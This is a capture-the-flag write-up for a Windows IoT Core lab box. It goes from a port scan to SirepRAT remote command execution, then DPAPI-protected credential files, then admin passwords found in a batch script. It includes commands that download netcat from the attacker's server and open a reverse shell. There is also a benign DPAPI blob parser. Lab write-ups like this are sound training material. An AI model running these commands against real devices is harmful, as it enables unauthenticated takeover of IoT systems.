Enumeration:
Started by enumerating ports:
root@osboxes:~/Documents/Omni# cat scan.txt
[*] OS based on TTL
Windows
[*] TCP Scan
Open ports: 22,135,5985,8080,29820,29819,29817
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 62:b3:5d:c6:e2:34:c3:0f:c5:86:ee:a3:28:1a:2e:53 (RSA)
| 256 37:1f:0d:0c:31:94:a5:fe:66:e8:f0:09:43:bb:b6:d0 (ECDSA)
|_ 256 c7:c7:a0:2f:cc:31:c4:07:7d:87:fb:4d:c9:28:c0:86 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=9/9%Time=5F591947%P=x86_64-pc-linux-gnu%r(NU
SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Execution time:
TTL: 0
Furious: 132
Nmap: 80
Total: 212
Port 8080 answers with a Basic-auth challenge for the realm "Windows Device Portal", which is the web management interface that ships with Windows 10 IoT Core, so the target is an IoT Core device rather than a regular Windows install.
Searching for known attacks against Windows IoT Core turned up SirepRAT, a tool that talks to the Sirep Test Service on TCP 29820 (the unrecognised service whose fingerprint nmap could not match above) and lets a remote client execute commands on the device without any authentication:
User
Used SirepRAT to upload netcat (nc64.exe, served over HTTP from the attacking machine) and get a reverse shell; an HResult of 0x0 in the reply means the command was launched successfully:
root@osboxes:~/Documents/Omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\Windows\System32\nc64.exe -Uri http://10.10.15.193:8000/nc64.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
root@osboxes:~/Documents/Omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Windows\System32\nc64.exe -e powershell.exe 10.10.15.193 443"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
After some manual enumeration, found some interesting files:
administrator@omni C:\Data\Users\app>type hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
PS C:\Data\Users\app> type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>
This is a PSCredential serialized with Export-Clixml: the UserName is plain text, but the Password is a SecureString protected with DPAPI under the profile of whoever exported it. Tried decoding it from the current shell but got the following error:
PS C:\Data\Users\app> $creds = Import-Clixml -Path .\user.txt
PS C:\Data\Users\app> $creds.GetNetworkCredential();
Key not valid for use in specified state
...
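To see why Import-Clixml cannot unwrap this from another account, the added Python example below (not part of the original write-up) parses the <SS> value from the user.txt shown above. The value is a DPAPI blob: a fixed header (provider GUID, the GUID of the master key that protected it, scope flags, cipher and hash algorithm IDs, salt, HMAC) followed by the encrypted SecureString bytes and a signature. The master key GUID names a key file in the owning user's profile that is itself encrypted with that user's password, so only that account (or someone holding its password) can decrypt the blob. The field layout follows the publicly reverse-engineered DPAPI blob format; the algorithm-name table is limited to the IDs relevant here.

```python
import re
import struct
import uuid
from dataclasses import dataclass

# Constructed input: the user.txt CLIXML copied from the write-up above. The <SS>
# element is the DPAPI-protected SecureString that Import-Clixml failed to unwrap.
CLIXML_SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>"""

# Every DPAPI blob starts with this provider GUID (stored little-endian on the wire).
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # flag bit: machine-scoped blob instead of user-scoped

# CryptoAPI ALG_ID values seen in DPAPI blobs (only the ones relevant here).
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800e: "CALG_SHA_512"}


@dataclass
class DpapiBlob:
    version: int
    masterkey_guid: uuid.UUID   # which master key file is needed to decrypt
    flags: int
    description: str
    crypt_alg: int
    crypt_alg_bits: int
    salt: bytes
    hash_alg: int
    hash_alg_bits: int
    hmac: bytes
    data: bytes                 # encrypted SecureString (UTF-16LE plaintext, padded)
    sign: bytes

    @property
    def user_scoped(self) -> bool:
        return not (self.flags & CRYPTPROTECT_LOCAL_MACHINE)


def _dword(buf: bytes, off: int):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _counted(buf: bytes, off: int):
    """A little-endian DWORD length followed by that many bytes."""
    n, off = _dword(buf, off)
    if off + n > len(buf):
        raise ValueError("truncated DPAPI blob")
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob: bytes) -> DpapiBlob:
    """Walk the DPAPI blob header; raises ValueError for anything that is not one."""
    version, off = _dword(blob, 0)
    provider = uuid.UUID(bytes_le=blob[off:off + 16])
    off += 16
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (provider GUID mismatch)")
    _mk_version, off = _dword(blob, off)
    mk_guid = uuid.UUID(bytes_le=blob[off:off + 16])
    off += 16
    flags, off = _dword(blob, off)
    desc_raw, off = _counted(blob, off)   # UTF-16LE, NUL-terminated, usually empty
    crypt_alg, off = _dword(blob, off)
    crypt_bits, off = _dword(blob, off)
    salt, off = _counted(blob, off)
    _hmac_key, off = _counted(blob, off)  # legacy field, zero-length in modern blobs
    hash_alg, off = _dword(blob, off)
    hash_bits, off = _dword(blob, off)
    hmac, off = _counted(blob, off)
    data, off = _counted(blob, off)
    sign, off = _counted(blob, off)
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return DpapiBlob(version, mk_guid, flags, desc_raw.decode("utf-16-le").rstrip("\x00"),
                     crypt_alg, crypt_bits, salt, hash_alg, hash_bits, hmac, data, sign)


def password_blob_from_clixml(xml: str) -> bytes:
    """Pull the hex-encoded <SS N="Password"> value out of Export-Clixml output."""
    m = re.search(r'<SS N="Password">([0-9A-Fa-f]+)</SS>', xml)
    if not m:
        raise ValueError("no SecureString password in CLIXML")
    return bytes.fromhex(m.group(1))


def describe_credential(xml: str) -> dict:
    """Summarize what protects the credential and which master key it needs."""
    b = parse_dpapi_blob(password_blob_from_clixml(xml))
    return {"masterkey_guid": str(b.masterkey_guid), "user_scoped": b.user_scoped,
            "cipher": ALG_NAMES.get(b.crypt_alg, hex(b.crypt_alg)), "cipher_bits": b.crypt_alg_bits,
            "hash": ALG_NAMES.get(b.hash_alg, hex(b.hash_alg)), "ciphertext_len": len(b.data)}


if __name__ == "__main__":
    for key, value in describe_credential(CLIXML_SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the blob above it reports a user-scoped blob (flags 0, so no CRYPTPROTECT_LOCAL_MACHINE), AES-256 with SHA-512, protected by master key 781d139e-27fe-4021-835d-b3caa2885364. The CLIXML file is portable, but without that master key, which lives in the owning user's profile and is unlocked by that user's logon secret, the data cannot be decrypted by any other account, which is exactly the error seen above.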
So kept enumerating until finding a file that contains user credentials:
PS C:\Program Files\WindowsPowershell\Modules> type PackageManagement/r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
This batch file loops forever: every few seconds it deletes every member of the local administrators group and sets the passwords of app and administrator back to the values above, so those are the credentials that actually hold (and any account added to administrators for persistence would be removed within seconds). Used app's credentials to log into the Windows Device Portal on port 8080 and get a reverse shell as app:
Running as app, the same Import-Clixml and GetNetworkCredential() calls from before now succeed, because the DPAPI master key protecting the SecureString belongs to app; the Password property of the returned NetworkCredential is the flag.
Root
To get root, log into the Device Portal as administrator with the password from r.bat and get a reverse shell the same way as for app. root.txt is not on the C: drive: enumerating with winPEAS showed it under the U: drive, and it is decoded the same way as user.txt, from the shell running as administrator.